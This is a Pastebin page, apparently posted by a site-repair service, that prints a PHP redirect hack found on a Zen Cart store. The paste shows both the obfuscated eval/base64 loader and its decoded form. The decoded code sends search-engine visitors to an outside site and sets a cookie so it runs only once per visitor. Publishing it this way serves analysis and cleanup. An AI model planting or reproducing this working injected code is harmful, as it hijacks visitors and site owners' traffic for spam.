hackrepair

Custom zencart redirect hack

Jun 9th, 2012
1,164
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. function reverse($str){
  3. if($str == ''){
  4. return null;
  5. }
  6. if(strlen($str) == 1){
  7. return $str;
  8. }else{
  9. $string = "";
  10. for($i=1;$i<=strlen($str);$i++){
  11. $string .=substr($str,-$i,1);
  12. }
  13. return $string;
  14. }
  15. }
  16. $zencart=reverse("edoced_46esab");
  17. eval ($zencart('ZXJyb3JfcmVwb3J0aW5nKDcpOwokY2hlY2sgPSJzaGluZS1jaGVjayI7CiRjaGVjazIgPSJ0d290aW1lIjsKJGFkc2VuX2NvZGUgPScnOy8vsuXI67nIuOi547jmCiRDb29raWVUaW1lPTA7CmlmIChpc3NldCgkX0NPT0tJRVsiVVNFUklEIl0pIGFuZCAoICRfQ09PS0lFWyJVU0VSSUQiXT09JGNoZWNrICkgKQp7SGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3d3dy50aGVtYWdpY21vbWVudC5jby51ayIpO30KZWxzZSBpZiAoaXNzZXQoJF9DT09LSUVbIlVTRVJJRCJdKSBhbmQgKCAkX0NPT0tJRVsiVVNFUklEIl09PSRjaGVjazIpICkKewp9CmVsc2UKewokdGFyZ2V0X3VybD1hcnJheSgpOwovLyR0YXJnZXRfdXJsWzBdPSJodHRwIjsKZm9yKCRpPTA7JGk8Mzk7JGkrKykNCnsNCgkkdGFyZ2V0X3VybFskaV09Imh0dHA6Ly93d3cudGhlbWFnaWNtb21lbnQuY28udWsiOwp9CmZvcigkaT00MDskaTwxMDA7JGkrKykNCnsNCgkkdGFyZ2V0X3VybFskaV09Im1haWx0bzpoYWNrc2VvQHBvc3QuY29tIjsNCn0NCmZ1bmN0aW9uIHJhbmRfYXJyYXkoJGFycikgDQp7IA0KCSRhcnJfc2l6ZT1zaXplb2YoJGFycik7DQoJJHRtcF9hcnI9YXJyYXkoKTsgDQoJZm9yKCRpPTA7JGk8JGFycl9zaXplOyRpKyspeyANCgkJbXRfc3JhbmQoKGRvdWJsZSkgbWljcm90aW1lKCkqMTAwMDAwMCk7IA0KCQkkcmQ9bXRfcmFuZCgwLCRhcnJfc2l6ZS0xKTsgDQoJCWlmKCR0bXBfYXJyWyRyZF09PSIiKSANCgkJeyANCgkJCSR0bXBfYXJyWyRyZF09JGFyclskaV07IA0KCQl9IA0KCQllbHNlDQoJCXsgDQoJCQkkaT0kaS0xOyANCgkJfSANCgl9IA0KCXJldHVybiAkdG1wX2FycjsgDQp9DQokYXR0YWNrX3VybD1yYW5kX2FycmF5KCR0YXJnZXRfdXJsKTsNCiRhdHRhY2t1cmw9Ind3dyI7DQokbDE9JF9TRVJWRVJbIkhUVFBfQUNDRVBUX0xBTkdVQUdFIl07DQppZihpc3NldCgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pKXsgDQokYTEgPSAkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107IA0KfSBlbHNlIHsgDQokYTEgPSAnJzsgDQp9IA0KJGwyPSJ6aCI7CiRhMj0iYmluZyI7CiRhMz0iY29tLmhrIjsKJGE1PSJnb29nbGUiOwokYTQ9InlhaG9vIjsKaWYgKCggc3RycG9zKCRsMSwkbDIpID09PSBmYWxzZSApYW5kKCAoIHN0cnBvcygkYTEsJGEzKSA9PSBmYWxzZSApKWFuZCgoIHN0cnBvcygkYTEsJGEyKSA9PSB0cnVlIClvciggc3RycG9zKCRhMSwkYTUpID09IHRydWUgKW9yKCBzdHJwb3MoJGExLCRhNCkgPT0gdHJ1ZSApKSBhbmQgKCBzdHJwb3MoJGF0dGFja191cmxbMV0sJGF0dGFja3VybCkgPT0gdHJ1ZSApKSB7CnNldGNvb2tpZSgiVVNFUklEIiwgInNoaW5lLWNoZWNrIiwgMCwiLyIsIiIpO0hlYWRlcigiTG9jYXRpb246ICRhdHRhY2tfdXJsWzFdIik7fQplbHNlCnsKc2V0Y29va2llKCJVU0VSSUQiLCAidHdvdGltZSIsIDAsIi8iLCIiKTsKfQp9'));
  18. ?><?php
  19.  
  20.  
  21. DECODED:
  22.  
  23. error_reporting(7);
  24. $check ="shine-check";
  25. $check2 ="twotime";
  26. $adsen_code ='';//
  27. $CookieTime=0;
  28. if (isset($_COOKIE["USERID"]) and ( $_COOKIE["USERID"]==$check ) )
  29. {Header("Location: http://www.themagicmoment.co.uk");}
  30. else if (isset($_COOKIE["USERID"]) and ( $_COOKIE["USERID"]==$check2) )
  31. {
  32. }
  33. else
  34. {
  35. $target_url=array();
  36. //$target_url[0]="http";
  37. for($i=0;$i<39;$i++)
  38. {
  39. $target_url[$i]="http://www.themagicmoment.co.uk";
  40. }
  41. for($i=40;$i<100;$i++)
  42. {
  43. $target_url[$i]="mailto:hackseo@post.com";
  44. }
  45. function rand_array($arr)
  46. {
  47. $arr_size=sizeof($arr);
  48. $tmp_arr=array();
  49. for($i=0;$i<$arr_size;$i++){
  50. mt_srand((double) microtime()*1000000);
  51. $rd=mt_rand(0,$arr_size-1);
  52. if($tmp_arr[$rd]=="")
  53. {
  54. $tmp_arr[$rd]=$arr[$i];
  55. }
  56. else
  57. {
  58. $i=$i-1;
  59. }
  60. }
  61. return $tmp_arr;
  62. }
  63. $attack_url=rand_array($target_url);
  64. $attackurl="www";
  65. $l1=$_SERVER["HTTP_ACCEPT_LANGUAGE"];
  66. if(isset($_SERVER['HTTP_REFERER'])){
  67. $a1 = $_SERVER['HTTP_REFERER'];
  68. } else {
  69. $a1 = '';
  70. }
  71. $l2="zh";
  72. $a2="bing";
  73. $a3="com.hk";
  74. $a5="google";
  75. $a4="yahoo";
  76. if (( strpos($l1,$l2) === false )and( ( strpos($a1,$a3) == false ))and(( strpos($a1,$a2) == true )or( strpos($a1,$a5) == true )or( strpos($a1,$a4) == true )) and ( strpos($attack_url[1],$attackurl) == true )) {
  77. setcookie("USERID", "shine-check", 0,"/","");Header("Location: $attack_url[1]");}
  78. else
  79. {
  80. setcookie("USERID", "twotime", 0,"/","");
  81. }
  82. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×